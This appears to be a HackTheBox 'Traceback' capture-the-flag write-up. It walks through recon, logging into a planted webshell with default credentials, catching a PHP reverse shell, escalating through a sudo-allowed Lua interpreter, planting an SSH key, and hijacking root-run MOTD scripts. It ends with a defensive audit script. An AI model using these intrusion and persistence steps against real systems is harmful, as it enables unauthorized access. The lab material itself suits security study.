Hello everyone and welcome back to yet another HTB writeup.
Our initial nmap scan reveals only an ssh and webserver open.
root@kali:~/Desktop/htb/Traceback# nmap -sC -sV 10.10.10.181 -p 1-65535 -o TCP_full_scan
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 20:46 EDT
Nmap scan report for 10.10.10.181
Host is up (0.036s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.48 seconds
On the website we find an interesting comment in the page source:
<body>
<center>
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
</center>
</body>
Dirbusting for files and folders with SecLists, then fuzzing for virtual hosts, gives no result.
root@kali:~/Desktop/htb/Traceback# wfuzz -H "Host: FUZZ.traceback.htb" -u "http://traceback.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 151
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://traceback.htb/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000690:   400        12 L     53 W     422 Ch      "gc._msdcs"

Total time: 48.01821
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 104.0646
Taking the hint from the comment, we build a wordlist of common webshell filenames and brute-force it against the box, which reveals /smevk.php.
root@kali:~/Desktop/htb/Traceback# cat wordlist
1n73ction.php
52.php
OsComPayLoad.php
c99.php
cgi
cgipro1.php
cgiproffesional.php
indoxploit
k2
marion001
pak.php
r57.php
shell4sym.php
smtp.php
up.txt
upluad.php
wso
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php
The webshell presents a login page, and the default credentials admin:admin get us straight in with full webshell access. We upload a PHP reverse shell and obtain a shell as webadmin.
root@kali:~/Desktop/htb/Traceback# nc -lvp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.10.181.
Ncat: Connection from 10.10.10.181:56150.
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 21:21:43 up  1:26,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
Enumeration quickly reveals a way to pivot to sysadmin, along with an interesting note.
$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
$ cd /home/webadmin
$ ls -la
total 48
drwxr-x--- 5 webadmin sysadmin 4096 Apr 15 20:18 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  449 Apr 15 20:51 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Apr 15 20:16 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$
Since luvit is a Lua interpreter that we can run as sysadmin without a password, we write a Lua file that spawns a shell and run it through sudo.
$ echo -n "os.execute('/bin/sh')" > privesc.lua
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
We then add our ssh public key to sysadmin's authorized_keys to obtain a fully interactive shell. On our attacker machine:
root@kali:~/Desktop/htb/Traceback# ssh-keygen -t rsa -b 4096
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): key
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in key.
Your public key has been saved in key.pub.
The key fingerprint is:
SHA256:mXCRn4D967VXQglQu7bEyfVgdJ8PRGHmaoEJQBA8q7E root@kali
The key's randomart image is:
+---[RSA 4096]----+
| .o+o+o..o..B..|
| o . +o o.B .o|
| o. .+o.o.*o.|
| . . o o+o Bo+.|
| + S .X. o|
| E .+... .|
| . ... o |
| . . . |
| . |
+----[SHA256]-----+
On the victim machine:
pwd
/home/sysadmin
echo "ssh-rsa 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 root@kali" >> ./.ssh/authorized_keys
We log in as sysadmin over ssh and enumerate the machine; the process list quickly turns up this cron job:
root@kali:~/Desktop/htb/Traceback# ssh -i key sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ ps aux
[...snip...]
root      3979  0.0  0.0  58792  3180 ?        S    21:32   0:00 /usr/sbin/CRON -f
root      3982  0.0  0.0   4628   860 ?        Ss   21:32   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
root      3984  0.0  0.0   7468   772 ?        S    21:32   0:00 sleep 30
[...snip...]
A root cron job is restoring the MOTD scripts: after sleeping 30 seconds it copies /var/backups/.update-motd.d/* over /etc/update-motd.d/. According to the Ubuntu man page for update-motd:
UNIX/Linux system administrators often communicate important information to console and
remote users by maintaining text in the file /etc/motd, which is displayed by the
pam_motd(8) module on interactive shell logins.
Luckily, /etc/update-motd.d/ is writable by sysadmin. However, we have only a 30-second window before our edits are overwritten by the copies in /var/backups/.update-motd.d/.
sysadmin@traceback:/etc/update-motd.d$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Apr 15 21:50 00-header
-rwxrwxr-x  1 root sysadmin  982 Apr 15 21:50 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Apr 15 21:50 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Apr 15 21:50 80-esm
-rwxrwxr-x  1 root sysadmin  299 Apr 15 21:50 91-release-upgrade
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
[..snip...]
[ -r /etc/lsb-release ] && . /etc/lsb-release
We add a line to 00-header that runs our php-reverse-shell.php, then log in over ssh within the 30-second window: pam_motd executes the edited script as root on login, and the callback lands on our listener as root!
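As an added defender-side check that is not part of the original writeup: the root cause above is that the scripts in /etc/update-motd.d are group-writable by sysadmin while pam_motd runs them as root on every login, and the 30-second restore from /var/backups is not a control, because any login inside that window still executes the edited script. This POSIX shell audit (the directory is a parameter; the function names are my own) lists the scripts in such a directory that a non-root user could modify.

```shell
#!/bin/sh
# Audit a directory of login-time scripts (e.g. /etc/update-motd.d, whose
# contents pam_motd executes as root on every interactive login) for files
# that someone other than root could modify.

# List regular files directly under $1 with the group or other write bit set.
# On Traceback this catches the rwxrwxr-x root:sysadmin scripts shown above.
motd_group_or_world_writable() {
    find "$1" -maxdepth 1 -type f -perm /022 | sort
}

# List regular files directly under $1 that are not owned by root. Reported
# separately because the fix differs (chown root:root vs. chmod go-w).
motd_nonroot_owned() {
    find "$1" -maxdepth 1 -type f ! -user root | sort
}

# Report the union of both findings. Returns 0 when the directory is clean,
# 1 when at least one script could be edited by a non-root user.
audit_motd_dir() {
    dir=${1:-/etc/update-motd.d}
    findings=$( { motd_group_or_world_writable "$dir"
                  motd_nonroot_owned "$dir"; } | sort -u )
    if [ -n "$findings" ]; then
        printf 'Scripts in %s editable by a non-root user:\n%s\n' "$dir" "$findings"
        return 1
    fi
    printf 'No non-root-editable scripts in %s\n' "$dir"
    return 0
}

# Usage on a live host: audit_motd_dir /etc/update-motd.d
```

A clean result is every script owned by root:root with mode 0755 or stricter; the same check applies to any other directory of root-executed hooks, such as cron.d or profile.d.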
And again, thanks for reading!